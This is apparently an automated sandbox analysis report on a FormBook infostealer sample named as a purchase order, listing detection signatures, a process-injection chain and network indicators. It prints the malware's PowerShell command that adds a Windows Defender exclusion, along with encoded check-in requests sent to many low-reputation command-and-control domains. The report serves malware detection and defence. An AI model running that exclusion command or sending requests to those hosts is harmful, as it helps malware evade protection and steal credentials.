Windows Analysis Report
PO 1202495088.exe

Overview

General Information

Sample name: PO 1202495088.exe
Analysis ID: 1574077
MD5: 49095d080a201256f23914317e65ef4b
SHA1: 6e5d17981778ab6e6929b486d1db0ee538ba4f10
SHA256: 168f3f67fdf19ef0a0afabb378ee803fb3cf1f822ad37ba51772bc96a58a83d0

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • PO 1202495088.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\PO 1202495088.exe" MD5: 49095D080A201256F23914317E65EF4B)
    • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • PO 1202495088.exe (PID: 1124 cmdline: "C:\Users\user\Desktop\PO 1202495088.exe" MD5: 49095D080A201256F23914317E65EF4B)
      • RAVCpl64.exe (PID: 7500 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cttune.exe (PID: 7748 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)
          • firefox.exe (PID: 5316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Process Memory Space: PO 1202495088.exe PID: 3264 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
4.2.PO 1202495088.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.PO 1202495088.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 1202495088.exe", ParentImage: C:\Users\user\Desktop\PO 1202495088.exe, ParentProcessId: 3264, ParentProcessName: PO 1202495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", ProcessId: 5408, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 1202495088.exe", ParentImage: C:\Users\user\Desktop\PO 1202495088.exe, ParentProcessId: 3264, ParentProcessName: PO 1202495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", ProcessId: 5408, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 896, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7792, ProcessName: svchost.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-12T21:54:58.180357+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.11.20 | 49728 | 103.106.67.112 | 80 | TCP

                AV Detection

                Source: PO 1202495088.exe, Avira: detected
                Source: PO 1202495088.exe, ReversingLabs: Detection: 50%
                Source: Yara match, File source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: PO 1202495088.exe, Joe Sandbox ML: detected
                Source: PO 1202495088.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 1202495088.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: cttune.pdb source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdb source: PO 1202495088.exe, PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4x nop then jmp 075FA047h, 1_2_075F96CC
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4x nop then jmp 075FA047h, 1_2_075F9B9D
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h, 12_2_0069B4E8
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 4x nop then mov ebx, 00000004h, 13_2_04CE04E8
                Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h, 14_2_0000020832DDC4E8

                Networking

                Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.11.20:49728 -> 103.106.67.112:80
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: DNS query: www.furrcali.xyz
                Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
                Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: global trafficHTTP traffic detected: GET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vavada-official.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.jyshe18.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.furrcali.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.activeusers.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.unlimitu.websiteUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.sob.ripUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /b9be/?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.blockconnect.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /1w6c/?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.guilda.proUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /f7zl/?Sb=JpVDbrUZlDTgo68GijwbXUpM20WTl/lO5ke29OZx5ZiPNIs3iQFHoOZPOWsCnUoFoD4OWghDdoQd24qIggPhoo7R/zvFzJ3VTGAfqCgLISGEH/s3DM2hN/E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.shandongyb.topUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /ivn4/?Hsa=KVXAK1dJ22EyzD&Sb=dMAQ+cXbzFKaj3/VQV3ARRE/+V/pDaMde5ltK60scu7oomHWLUNrXeVoeNmDAD713TgV67ncuzdzcshVShA4O3nj+t7UnCG15p0qDWw9jP76vMR/2Muxc8U= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.augier2619.topUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /kr0d/?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.outandaboutatlanta.netUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /vhgo/?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.bonheur.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /5juh/?Sb=fBnyqhzI58/0qqn5K0IHu1zVTzK5FlfyZRuzvxuqSvPnsbI29xaXWUSjgesV5KpSdxDguhZQGIO0bb0sj0YKl6QMA8RyIBjzU5arC02cubFE1HnMLxW3shs=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.inbulkses.shopUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficDNS traffic detected: DNS query: www.tabyscooterrentals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ftaane.net
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.vavada-official.buzz
                Source: global trafficDNS traffic detected: DNS query: www.jyshe18.buzz
                Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
                Source: global trafficDNS traffic detected: DNS query: www.activeusers.tech
                Source: global trafficDNS traffic detected: DNS query: www.unlimitu.website
                Source: global trafficDNS traffic detected: DNS query: www.sob.rip
                Source: global trafficDNS traffic detected: DNS query: www.blockconnect.tech
                Source: global trafficDNS traffic detected: DNS query: www.guilda.pro
                Source: global trafficDNS traffic detected: DNS query: www.shandongyb.top
                Source: global trafficDNS traffic detected: DNS query: www.augier2619.top
                Source: global trafficDNS traffic detected: DNS query: www.outandaboutatlanta.net
                Source: global trafficDNS traffic detected: DNS query: www.bonheur.tech
                Source: global trafficDNS traffic detected: DNS query: www.inbulkses.shop
                Source: unknownHTTP traffic detected: POST /2j93/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 199Connection: closeHost: www.milp.storeOrigin: http://www.milp.storeReferer: http://www.milp.store/2j93/User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Dec 2024 20:53:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-12T20:53:57.4767818Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:54:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkjmG8UsPJHwvfHe4uV3DhV4U00Aypw6rZm89zhMAk490g97Ar5zMwCglmW%2BgTUxlS2%2FongBfEddAO3UM0xGS7YM2udV3iGodScaXUqZPaarsvJ1ZIbBOFSOFeqI0bU5qSZ6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f109c7ffd54458d-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114362&min_rtt=114362&rtt_var=57181&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:54:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGPAKatVayDWW2tuxyE0EaGsDim7WGXINAyc9a47woTnljPaT%2BzxI0XWCqUm5Pzh2j8GqbQN%2FKkAe6cABmUraYefNm1%2BNMlsUp%2BlmgP6qZpX4e%2BITbO3rW7X3j4AdW4azIjP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f109c907b856779-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114143&min_rtt=114143&rtt_var=57071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:54:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhkTHG0vo2tToDRsDyedsxOKWpjoIDytBbyVL%2B5CGF8Z9inBKqLqzHsVfHJVcki5b1hTU3urTNEGCPOvqwMIdJw2kgLVB4oT7WK8rt0Y%2FezmUG%2Bu1nRdToxAaetPoHPCoD48"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f109ca10fc4b06f-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114244&min_rtt=114244&rtt_var=57122&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:54:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jL0PyhODxy6Fr61CEDETv2y59VTQ%2Bem1yMLVQ4TI2bz0nTaW7beyGx0ZebIfVRIIZ%2B3ricxGs4EYK6a6eaSEYo2TZf78c6hplFvuNeasVijOKxAVdyBagJiGKBaHQOK4MvoQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f109cb17e74135f-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114349&min_rtt=114349&rtt_var=57174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQBrowser') >
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:54:58 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:55:00 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:55:03 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:55:06 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:55:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:55:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
